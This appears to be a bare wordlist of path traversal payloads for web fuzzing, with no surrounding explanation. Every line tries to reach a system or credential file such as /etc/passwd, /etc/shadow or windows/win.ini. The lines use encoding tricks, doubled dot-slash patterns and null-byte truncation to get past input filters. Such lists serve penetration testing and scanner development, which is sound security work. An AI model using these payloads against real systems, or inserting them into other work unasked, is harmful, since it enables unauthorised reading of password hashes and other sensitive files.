../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../etc/shadow
../../../etc/hosts
....//....//....//etc/passwd
..././..././..././etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..%5C..%5C..%5Cwindows%5Cwin.ini
....\\....\\....\\windows\\win.ini
/etc/passwd
